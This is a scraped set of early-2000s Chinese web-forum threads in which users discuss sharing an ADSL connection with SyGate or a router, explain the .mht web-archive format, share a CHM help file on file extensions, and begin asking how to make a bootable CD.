来自：小城淄博
注册：2000-10-20
 发表于 2001-09-29 11:28:29 按此观看caience的个人资料 按此发邮件给caience 访问caience的主页 发送悄悄话给caience 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看caience的IP
up~~
wo bu hui`~

GUOGUO & MUMU
=NICEMOOD= CS team awper: caience
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-09-29 12:18:02 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
主机要装个共享软件吧~~ SyGate、WinGate都可以..
panda

超级用户
积分：316
发帖：375
来自：
注册：2000-03-06
 发表于 2001-09-29 12:57:10 按此观看panda的个人资料 按此发邮件给panda panda 的 oicq 是1127197,查看 1127197 的资料 发送悄悄话给panda 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看panda的IP
记得服务器要有两块网卡

用SYGATE的话，要指定网关

www.cnvrml.org
www.chinese3d.com
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-09-29 12:59:38 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
有两块网卡就不需要Hub了吧
happyseven

众生无我
积分：3092
发帖：1948
来自：无
注册：2001-03-08
 发表于 2001-09-29 13:04:35 按此观看happyseven的个人资料 按此发邮件给happyseven happyseven 的 oicq 是5849467,查看 5849467 的资料 发送悄悄话给happyseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看happyseven的IP
我这里用的是sygate

Blueidea Web Team
Moderator Of Amphitheater Forum

大白若辱，大方无隅，大器晚成，大音希声，大象无形，道隐无名。夫唯道，善贷且成。
tones

Fly away
积分：1729
发帖：1422
来自：Sydney,Au
注册：2000-10-02
 发表于 2001-09-29 14:09:26 按此观看tones的个人资料 按此发邮件给tones 访问tones的主页 tones 的 oicq 是40844329,查看 40844329 的资料 发送悄悄话给tones 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tones的IP
panda在上个帖子中说
引用:
记得服务器要有两块网卡

用SYGATE的话，要指定网关

不用

：最后的一缕曙光，我相信一定在中国 ：
：：我就是所谓的海“龟”派了：：
rogers

经典无赖
积分：1640
发帖：1529
来自：北京
注册：2000-01-20
 发表于 2001-09-29 14:13:16 按此观看rogers的个人资料 该用户不允许显示它的电子邮件 访问rogers的主页 发送悄悄话给rogers 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看rogers的IP
我也打算买正版的游戏了，否则3CD下起来要等国庆之后了。

1 つは頻繁に潅漑する野菜農夫を...
-------------------------------------------------------------
: : : 桌面库 { 酷! } DeskCool.com : : . . .
蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2001-09-29 14:20:40 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
我也想啊，既然已经有了HUB，何必要JIMBOB再从我的机器上走一次呢。他机器到HUB就和ADSL是联系上的啊。

现在有没有办法，JIMBOB直接走HUB到ADSL。

SYGETE昨天也用过了。但如果我不开机，他就不能用啊。

如果是他用这个拨号软件先拨了，他不也要装一个SYGETE，而且是哪一个先拨号，谁就要改自己的网关，烦啊。

有没有别的解决办法啊。

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

jimbob

抄级闪客
管理员
积分：1512
发帖：572
来自：P.R.China
注册：2000-03-16
 发表于 2001-09-29 14:29:10 按此观看jimbob的个人资料 按此发邮件给jimbob 发送悄悄话给jimbob 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jimbob的IP
用 sygate 吧，晚上我回去试。

看一看，抄一抄，你抄我抄有提高!

Blueidea Web Team
Moderator Of Flash Forum

randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-09-29 14:53:02 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
西西，我家装长城宽带了，还凑合，350开户，全包月150。ADSL我家没端口，CM我家的有线电视不是省里的没得用……只好装长城了，FTTB的。

always ran...
blueonline

Blueonline
积分：815
发帖：1676
来自：blue-online.
注册：2000-12-09
 发表于 2001-09-29 14:58:54 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
randomix在上个帖子中说
引用:
西西，我家装长城宽带了，还凑合，350开户，全包月150。ADSL我家没端口，CM我家的有线电视不是省里的没得用……只好装长城了，FTTB的。

fttb是不是在小区里安装的？你们那里有个人申请吗？

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

rogers

经典无赖
积分：1640
发帖：1529
来自：北京
注册：2000-01-20
 发表于 2001-09-29 15:03:14 按此观看rogers的个人资料 该用户不允许显示它的电子邮件 访问rogers的主页 发送悄悄话给rogers 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看rogers的IP
嗯，已经买了正版了。不过安装居然要2G的空间。

1 つは頻繁に潅漑する野菜農夫を...
-------------------------------------------------------------
: : : 桌面库 { 酷! } DeskCool.com : : . . .
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-09-29 15:06:59 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
我们小区装了FTTB啊，但是作为个人，我还要申请安装入户啊，我们小区不是给每人家里都配的（老小区了），得自己报。

always ran...
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-09-29 15:07:54 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
不行
你的那个DSL Modem只能连到PC

要做到你所说的效果
必须是专线DSL
且Modem也不一样

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-09-29 15:08:06 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
蓝色在上个帖子中说
引用:
我也想啊，既然已经有了HUB，何必要JIMBOB再从我的机器上走一次呢。他机器到HUB就和ADSL是联系上的啊。

现在有没有办法，JIMBOB直接走HUB到ADSL。

SYGETE昨天也用过了。但如果我不开机，他就不能用啊。

如果是他用这个拨号软件先拨了，他不也要装一个SYGETE，而且是哪一个先拨号，谁就要改自己的网关，烦啊。

有没有别的解决办法啊。

ADSL局域网共享上网时，服务器要用双网卡（一块是局域网的，一块用于ADSL接入），直接连接HUB是不行的，如果不想通过服务器共享，你有一个花钱的办法，ADSL接入路由器，再通过路由器连接HUB，这样即使你不开机，你的JIMBOB也可以享用这条ADSL了
路由器大概小于3000RMB吧

等我想想再签
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-09-29 15:09:49 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
我提个建议，蓝色睡觉的时候jimbo开机，jimbo睡觉的时候蓝色开机，2个电脑用一个接入就可以了，经济有实惠！还有利于健康！

always ran...
amith

终级用户
积分：620
发帖：327
来自：aougu.com
注册：2001-04-20
 发表于 2001-09-29 15:29:08 按此观看amith的个人资料 按此发邮件给amith 访问amith的主页 amith 的 oicq 是1611770,查看 1611770 的资料 发送悄悄话给amith 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看amith的IP
蓝色呀，我现在还没有体会到宽带的乐趣呀，不行，不公平。国庆说什么我也要把电脑抱到你那住你的吃你的，睡你的。用你的，你的adsl上网。呵呵呵呵

号外，申请 adsl 好呢？ 还是 有线通呀。我住的地方挂满了 有线通的 条幅广告呀。 adsl 移户要4百多，有线通要吗？ 究竟哪个速度快呀。

randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-09-29 15:49:52 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
有线通是什么啊？光说个俗称没用啊？？？是不是有线电视的？如果是就是CABLE MODEM了（cm）

always ran...
jimbob

抄级闪客
管理员
积分：1512
发帖：572
来自：P.R.China
注册：2000-03-16
 发表于 2001-09-29 15:52:46 按此观看jimbob的个人资料 按此发邮件给jimbob 发送悄悄话给jimbob 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jimbob的IP
to 赵鹏: adsl modem 可以直接接到HUB上的，只要用交叉线连到HUB的 uplink口上就可以了，需要使用的PC机装个 adsl的虚拟拨号软件就可以了。

to BIGBUG: 不需要那么复杂呀，如果要配置路由器什么的，还需要买收发器，而且需要提供商采用专线方式来提供服务，这个好象不大现实

to randomix: 你的建议值得考虑，不过我当心兰色老是睡觉不好，要变胖的，那岂不影响他在我们心目中瘦瘦的光辉形象 ？

看一看，抄一抄，你抄我抄有提高!

Blueidea Web Team
Moderator Of Flash Forum

barry

终级用户
积分：723
发帖：357
来自：上海
注册：2001-01-29
 发表于 2001-09-29 16:15:46 按此观看barry的个人资料 按此发邮件给barry 访问barry的主页 barry 的 oicq 是24319347,查看 24319347 的资料 发送悄悄话给barry 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看barry的IP
我装的是长城宽带，速度飞快。

A bosom friend afar brings a distant land near.
海内存知己,天涯若比邻
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-09-29 16:32:00 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
barry在上个帖子中说
引用:
我装的是长城宽带，速度飞快。

握手握手！！长城宽带好！：）

always ran...
蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2001-09-29 16:43:48 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
有线通其实已经到家里了，就是不开通，一问要一个多月，还要1400左右。等不及了。

所以有天走到路上，看到有ADSL促销，还有折，就买了

说实话，走在路上，就把900元钱给了别人。真有点悬。也不知是真是假。

to rogers

2G，难怪安装的时候，要放三张光盘，到最后，又要放第二张光盘。装完后重启，还又要用第三张才能玩，这个顺序，可真够乱的。

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

rbell

初级用户
积分：59
发帖：122
来自：亚贝尔实验室
注册：2000-03-03
 发表于 2001-09-29 17:56:51 按此观看rbell的个人资料 按此发邮件给rbell 访问rbell的主页 rbell 的 oicq 是64667220,查看 64667220 的资料 发送悄悄话给rbell 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看rbell的IP
有没有拨号共享的功能？

闪而有志，自强不息！
jimbob

抄级闪客
管理员
积分：1512
发帖：572
来自：P.R.China
注册：2000-03-16
 发表于 2001-09-29 20:11:00 按此观看jimbob的个人资料 按此发邮件给jimbob 发送悄悄话给jimbob 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jimbob的IP
KAO，气死我了，装了sygate Home Network 4.2 build 803 ， 问题就来了！

我 ping 任意网址都是通的，在兰色那太机器使用oicq等都比较正常，只是用IE的时候，老是提示我 DNS错误，我修改TCP/IP，加上外网的DNS server都不行 。
另外，如果在兰色的ie里面刷新快一些，可以先看到部分页面，很快又返回DNS错误。说明网络其实是通的，但为什么ie不能用，哪位用过 sygate的高手能帮帮我么？

看一看，抄一抄，你抄我抄有提高!

Blueidea Web Team
Moderator Of Flash Forum

blink

初级用户
积分：18
发帖：55
来自：南京
注册：2001-09-22
 发表于 2001-09-29 20:49:20 按此观看blink的个人资料 按此发邮件给blink blink 的 oicq 是20092850,查看 20092850 的资料 发送悄悄话给blink 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blink的IP
可惜这里的用户没有开网吧的

在痛苦中寻找快乐！
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-09-29 20:53:45 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
DSL Modem是通过网卡连通PC呢
还是USB连通

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
这个主题共有2页：1 2 上一贴 | 下一贴
快速回复 | 主题：ADSL宽带装好了，盟军2的正版也买了
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


.mht是什么格式的文件，为什么能用浏览器打开？

计算机技术
.mht是什么格式的文件，为什么能用浏览器打开？

上一贴 | 下一贴
发表人 主题: .mht是什么格式的文件，为什么能用浏览器打开？
QYworld

超级用户
积分：440
发帖：134
来自：北京
注册：2000-12-30
 发表于 2001-12-02 16:28:17 按此观看QYworld的个人资料 按此发邮件给QYworld 访问QYworld的主页 QYworld 的 oicq 是28709006,查看 28709006 的资料 收藏该主题供以后查看 发送悄悄话给QYworld 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QYworld的IP
同上，谢谢

网酷中国
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-12-02 16:33:05 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
好像是病毒

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

QYworld

超级用户
积分：440
发帖：134
来自：北京
注册：2000-12-30
 发表于 2001-12-02 16:39:31 按此观看QYworld的个人资料 按此发邮件给QYworld 访问QYworld的主页 QYworld 的 oicq 是28709006,查看 28709006 的资料 发送悄悄话给QYworld 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QYworld的IP
不是，是蓝色理想提供的一个插件制作教程下载版

就是这种格式

网酷中国
jorkof

终级用户
积分：1197
发帖：367
来自：北京
注册：2001-06-16
 发表于 2001-12-02 16:40:35 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
那应该是帮助文件一类的了

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
QYworld

超级用户
积分：440
发帖：134
来自：北京
注册：2000-12-30
 发表于 2001-12-02 16:42:25 按此观看QYworld的个人资料 按此发邮件给QYworld 访问QYworld的主页 QYworld 的 oicq 是28709006,查看 28709006 的资料 发送悄悄话给QYworld 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QYworld的IP
用什么来制作？

网酷中国
jorkof

终级用户
积分：1197
发帖：367
来自：北京
注册：2001-06-16
 发表于 2001-12-02 16:50:27 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
软件下载的网站都应该有做电子书的软件

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
QYworld

超级用户
积分：440
发帖：134
来自：北京
注册：2000-12-30
 发表于 2001-12-02 18:00:27 按此观看QYworld的个人资料 按此发邮件给QYworld 访问QYworld的主页 QYworld 的 oicq 是28709006,查看 28709006 的资料 发送悄悄话给QYworld 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QYworld的IP
我倒～

还是没说用什么做的

网酷中国
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-02 21:45:48 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
web电子邮件档案

缘是天定,份在人为.
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-02 21:49:35 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
QYworld在上个帖子中说
引用:
用什么来制作？

用不着专门的软件，IE5.0以上的版本就可以把网页另存为mht格式的，这种方式是将当前的Web页和所有被当前页显示的文件一起保存到一个mht的文件中，您同样可以在离线后用IE浏览保存的页面。

缘是天定,份在人为.
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-02 23:04:43 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
mht就是mono html，就是独立的HTML文件，他是IE在save as时将页面中所有可以收集的元素全部存放在一个页面里，当然尺寸就大了啦，不过倒省却了相对路径绝对路径的烦心事。

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

krysler

初级用户
积分：0
发帖：1
来自：武汉
注册：2001-12-03
 发表于 2001-12-03 03:18:11 按此观看krysler的个人资料 按此发邮件给krysler krysler 的 oicq 是7438095,查看 7438095 的资料 发送悄悄话给krysler 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看krysler的IP
QYworld在上个帖子中说
引用:
同上，谢谢

.mht是一种WEB电子邮件档案，能用浏览器打开的前提是你的机子上必须装有OUTLOOK EXpress ！在我们选择保存网也类型时可以看到有这一项，其最大优点是所保存的网页只有一个文件，便于管理。而以.html保存的网页，你会看到其实有一个网页和相应的一个文件夹，IE把页面元素分开存放了。说白了，该文件就是你从浏览器中看到的望页的全部。

#############
#爱一个人不需要理由
#正如上网不需要理由
#############
自由光束

终级用户
积分：936
发帖：291
来自：中国·哈尔滨
注册：2000-12-09
 发表于 2001-12-03 09:56:04 按此观看自由光束的个人资料 按此发邮件给自由光束 访问自由光束的主页 自由光束 的 oicq 是2905924,查看 2905924 的资料 发送悄悄话给自由光束 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自由光束的IP
这不是web电子邮件档案的文件格式吗？
你可以把任何网页转成这种格式，它会把图像和文字放在一个文件中，不会像网页哪样把文字和图像分离！
制作这种文件的具体方法，用IE打开你要制的网页，然后点文件菜单，里的另存为，在何存类型上，看到了吧，选mht，一切OK！！！

人活着就应该有梦想，如果人活着没有梦想，那和咸鱼有什么区别？
个人主页： http://sunber.home.sohu.com
QYworld

超级用户
积分：440
发帖：134
来自：北京
注册：2000-12-30
 发表于 2001-12-04 16:20:20 按此观看QYworld的个人资料 按此发邮件给QYworld 访问QYworld的主页 QYworld 的 oicq 是28709006,查看 28709006 的资料 发送悄悄话给QYworld 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QYworld的IP
原来这样阿，哈哈，大家一说我才想起来，以前看到过这样一篇文章，好像这样也可以保存flash是不是？

网酷中国
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-04 21:35:36 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
下载这个文件
http://www.52nh.com/hw/soft/chm/ext.chm

[这消息被51windows编辑过(编辑时间2002-05-21 10:22:30)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

蓝极

我的家
积分：1252
发帖：775
来自：失落城市
注册：2001-02-01
 发表于 2002-05-21 09:38:30 按此观看蓝极的个人资料 按此发邮件给蓝极 蓝极 的 oicq 是456874,查看 456874 的资料 发送悄悄话给蓝极 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝极的IP
这样也可以保存flash吗？

我随风飘……
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-21 10:19:38 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
flash保存不下了！不过可以把路径保存下来！

如果你从网上保存了一页，页中一个flash，只有你能连上网，并且这个文件没有删除，就可以打开！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：.mht是什么格式的文件，为什么能用浏览器打开？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


做了一个关于文件扩展名的帮助文件

计算机技术
做了一个关于文件扩展名的帮助文件

上一贴 | 下一贴
发表人 | 主题: 做了一个关于文件扩展名的帮助文件
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2001-12-04 21:19:30 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 以前装了windows xp测试版，当然打开没有注册类型的文件时，会提示你要不要到网上找一下这个文件是什么类型的，我就跟着去了，之后又找到了一个关于扩展名的网页，一口气全下载下来了，之后把网页重新做了一遍 后来又下载了一个做chm文件的程序，就把网页做成chm格式的，觉得挺不错的，所以就把它上传到我的网页上了，有兴趣的可以下载下来看一下！只有116K http://www.5dns.com/hw/windows/ext/ext.chm Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-04 21:22:18 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 不错不错!~ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
小诺 替补版主 积分：6499 发帖：3746 来自：Shanghai 注册：2000-09-16 | 发表于 2001-12-04 21:28:33 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP GOOD~
fanbl 终级用户 积分：2057 发帖：563 来自： 注册：2002-03-20 | 发表于 2002-05-05 01:48:07 按此观看fanbl的个人资料 按此发邮件给fanbl 访问fanbl的主页 发送悄悄话给fanbl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fanbl的IP 打不开呀? 我是菜鸟请多关照
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2002-05-05 09:03:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 可能是作者删了，这还有一个关于文件扩展名的： http://www.blueidea.com/bbs/NewsDetail.asp?id=303551 Blueidea Web Team. Moderator Of Computer Technology Forum
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-05-07 01:54:46 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 以前的空间不行了！ 请到这个地址下载 http://www.52nh.com/hw/soft/chm/ext.chm Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
上一贴 | 下一贴
快速回复 | 主题：做了一个关于文件扩展名的帮助文件
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何制作光盘启动盘？急！谢谢

计算机技术
如何制作光盘启动盘？急！谢谢

上一贴 | 下一贴
发表人 主题: 如何制作光盘启动盘？急！谢谢
阿P

@1981
积分：1289
发帖：539
来自：@1981.COM
注册：2000-11-03
 发表于 2001-12-03 10:00:09 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 收藏该主题供以后查看 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP
怎么制作启动计算机的光盘？

谢谢~！

www.@1981.com
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-03 12:24:04 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
(转)需要什么
easy cd－creator中
    制作软盘启动盘
    制作光盘启动盘首先需要制作一张软盘启动盘，例如可制作一张windows 98的启动盘，操作步骤如下：
    1、控制面板→添加/删除程序→启动盘→创建启动盘；
    2、根据提示在光驱中插入windows 98安装光盘，插入空白软盘，确定；
